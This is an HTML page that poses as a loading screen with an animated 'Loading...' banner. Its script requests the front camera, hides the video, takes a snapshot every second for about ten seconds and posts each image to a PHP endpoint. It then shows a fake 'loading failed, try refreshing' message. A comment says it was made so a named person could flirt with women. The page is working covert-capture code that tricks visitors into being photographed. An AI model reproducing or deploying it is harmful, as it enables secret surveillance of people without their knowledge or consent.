<!DOCTYPE html>
<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
    <script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.js"></script>
    <script type="text.javascript" ,src="https://cdn.staticfile.org/jquery/1.10.2/jquery.min.js"></script>
    <!--<script src="camvas.js"></script>-->
    <style>
      body {
    display: grid;
    /* grid-template-columns: repeat(auto-fit,minmax(250px,1fr)); */
    /* grid-auto-rows: 100px; */
    place-items:center;
  }
  
  * {
    box-sizing: border-box;
  }
        .classic-6 {
          position: absolute;
          left:50%;
          top:50%;
          width:100%;
          margin:-10% 0 0 -18%;
          display:block;
    text-align:center;
    /* width: 100px; */
    --w:10ch;
    font-weight: bold;
    font-family: monospace;
    font-size: 100px;
    letter-spacing: var(--w);
    width:var(--w);
    overflow: hidden;
    white-space: nowrap;
    text-shadow: 
      calc(-1*var(--w)) 0, 
      calc(-2*var(--w)) 0, 
      calc(-3*var(--w)) 0, 
      calc(-4*var(--w)) 0,
      calc(-5*var(--w)) 0, 
      calc(-6*var(--w)) 0, 
      calc(-7*var(--w)) 0, 
      calc(-8*var(--w)) 0, 
      calc(-9*var(--w)) 0;
    animation:c6 2s infinite;
  }
  .classic-6:before {
            display:block;
    text-align:center;
    content:"Loading...";
  }
  @keyframes c6 {
    20% {text-shadow: 
      calc(-1*var(--w)) 0, 
      calc(-2*var(--w)) 0 red, 
      calc(-3*var(--w)) 0, 
      calc(-4*var(--w)) 0 #ffa516,
      calc(-5*var(--w)) 0 #63fff4, 
      calc(-6*var(--w)) 0, 
      calc(-7*var(--w)) 0, 
      calc(-8*var(--w)) 0 green, 
      calc(-9*var(--w)) 0;}
    40% {text-shadow: 
      calc(-1*var(--w)) 0, 
      calc(-2*var(--w)) 0 red, 
      calc(-3*var(--w)) 0 #e945e9, 
      calc(-4*var(--w)) 0,
      calc(-5*var(--w)) 0 green, 
      calc(-6*var(--w)) 0 orange, 
      calc(-7*var(--w)) 0, 
      calc(-8*var(--w)) 0 green, 
      calc(-9*var(--w)) 0;}
    60% {text-shadow: 
      calc(-1*var(--w)) 0 lightblue, 
      calc(-2*var(--w)) 0, 
      calc(-3*var(--w)) 0 #e945e9, 
      calc(-4*var(--w)) 0,
      calc(-5*var(--w)) 0 green, 
      calc(-6*var(--w)) 0, 
      calc(-7*var(--w)) 0 yellow, 
      calc(-8*var(--w)) 0 #ffa516, 
      calc(-9*var(--w)) 0 red;}
    80% {text-shadow: 
      calc(-1*var(--w)) 0 lightblue, 
      calc(-2*var(--w)) 0 yellow, 
      calc(-3*var(--w)) 0 #63fff4, 
      calc(-4*var(--w)) 0 #ffa516,
      calc(-5*var(--w)) 0 red, 
      calc(-6*var(--w)) 0, 
      calc(-7*var(--w)) 0 grey, 
      calc(-8*var(--w)) 0 #63fff4, 
      calc(-9*var(--w)) 0 ;}
  }
    </style>
    <script>
      window.onload=function(){

      };
        function getMedia() {
            console.log("1");
            
            var constraints = {
                video: {  width: 300, height: 300,'facingMode': "user" }
            };
            // console.log("constraints",constraints);
            var video = document.getElementById("video");
            // console.log("video",video);
            var promise = navigator.mediaDevices.getUserMedia(constraints);
            // console.log("promise".promise);
            promise.then(function(MediaStream) {
                video.srcObject = MediaStream;
                console.log(video);
                // video.play();
            });
            var video = document.getElementById("video");
            video.style.display = "none";
            // var canvas = document.getElementById("canvas");
            // var ctx = canvas.getContext('2d');
            // ctx.drawImage(video, 0, 0, 300, 300);
        
            takePhoto();
        }
        
        function takePhoto() {
            console.log("2");
            var video = document.getElementById("video");
            var img = document.getElementById("img");
            video.style.display = "none";
            var canvas = document.getElementById("canvas");
            var ctx = canvas.getContext('2d');
            ctx.drawImage(video, 0, 0, 300, 300);
            img.src = canvas.toDataURL("image/png");
            $.ajax({
                type: 'post',
                url: 'Camrea3.php',
                data: {
                    img: img.src
                }
            })
        }
        var timesRun = 0;
        var interval = setInterval(function(){
        timesRun += 1;
        if(timesRun === 10){
        clearInterval(interval);
        }
        //do whatever here..
        takePhoto()
        }, 1000);
        function show(){
        console.log("cg");
        $(".classic-6").css("display", "none")
        $(".classic").css("display", "block")
        }
        setTimeout(show,11000);
    </script>
</head>

<body onload="getMedia()">
    
    <div  class="classic-6" style="display: block;"></div>
    <div class="classic" style="display: none;">加载失败，刷新试试</div>
    <!--<h1>本功能专为杨宇铮撩妹开发，不承担任何责任，有问题请去揍杨宇铮，身份证：我也不知道，哈哈哈哈</h1>-->
    <div style="display:none;text-align:center;vertical-align:middle;background-size: contain;">
            <img    style="height: auto; width: auto\9; width:50%;"src="" id="img" alt="" name="imge" />
        </div>
    <div class="box" style="text-align:center;vertical-align:middle;background-size: contain;">
        <!-- <input class="input" type="button" value="1" style="width: 100px;height: 30px;" onclick="getMedia()" /> -->
        <!--<input class="input" type="button" value="1" style="width: 100px;height: 30px;" onclick="getMedia()" /> -->
        <video id="video" width="300px" height="300px" autoplay="autoplay"></video>
        <canvas  style="display:none" id="canvas" text-align:center width="300px" height="300px"></canvas>
        
        <input type="hidden" id="snap" style="width: 100px;height: 30px;"  value="2" onclick="takePhoto()">
         <!-- <meta http-equiv="refresh" content="5;url=index2.html">-->
    </div>

</body>

</html>